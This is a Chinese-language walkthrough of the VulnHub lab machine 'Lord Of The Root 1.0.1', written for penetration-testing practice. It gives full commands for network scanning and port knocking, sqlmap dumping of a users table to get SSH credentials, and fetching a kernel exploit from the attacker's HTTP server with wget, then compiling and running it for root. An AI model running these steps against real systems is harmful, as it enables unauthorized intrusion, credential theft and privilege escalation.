6-VulnHub-Lord Of The Root 1.0.1

VulnHub-Lord Of The Root: 1.0.1

靶机地址：https://www.vulnhub.com/entry/lord-of-the-root-101,129/
目标：得到root权限&找到flag.txt
作者：尼德霍格007
时间：2021-7-16

信息收集

扫描目标主机

nmap -sP 192.168.21.0/24

扫描开放端口

nmap -A -p 1-1000 192.168.21.141

看到只开放了22端口，尝试连接一下

easy as 1,2,3

提示敲门程序在运行

发送tcp的数据包分别到这三个端口

nmap -r -Pn -p 1,2,3 192.168.21.141

再次扫描端口

发现开启了1337端口，是个web服务，尝试访问

只有一张图，英文来自指环王，意思是我愿意把魔戒带到MORDOR，访问一下mordor试试

查看源代码

有一串密文，像是base64

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

解密两次得到

/978345210/index.php

是一个路径，访问

获取shell

尝试弱口令登陆失败，就不放图了

不知道用户名和密码的情况下，可以使用SQLMAP注入试一下

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms --dbs

-o：开启所有优化
-u：指定目标URL
–forms：自动判断注入
–dbs：枚举DBMS所有的数据库名称

（有提示y/n时，看不懂默认y就可以或者直接回车）

这里获得了一个Webapp数据库，继续获取Webapp表信息

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp --tables

-D：指定数据库
–tables：列出该数据库所有的表

这里获得了一个Users表

继续对表内容进行信息获取

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp  -T Users --columns

-T：指定表
–columns：列出该表的所有表项

表中有三个字段id，password，和username

继续获取表中详细信息

 sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp  -T Users -C id,username,password --dump

-C：指定列
–dump：转储DBMS的数据库中的表项

得到用户名和密码，使用这些用户名和密码ssh登录

ssh *用户名*@*ip*

最后成功登录

用户名：smeagol

密码：MyPreciousR00t

提权

uname -a查看靶机内核版本和系统版本

在https://www.exploit-db.com/查找可利用漏洞

点击下载按钮把exp文件下载到本地

在kali攻击机用python开启一个简单的http服务

python -m SimpleHTTPServer 6666

把文件下载到靶机

靶机执行

wget http://192.168.21.128:6666/39166.c

编译

gcc 39166.c -o p

-o指定编译后的文件名

给执行权限

chmod +x p

运行

./p

此时可以看到已经是root组的用户了，提权成功

获得flag，任务完成

总结

这次的漏洞复现主要考察了port_knocking、使用sqlmap获取数据库信息和利用ubuntu系统漏洞来提权，难度适中。对我来说，port_knocking是之前没有见到过的，需要多加练习。而且使用sqlmap获取数据库信息和查找系统漏洞进行利用的能力也需要多加锻炼。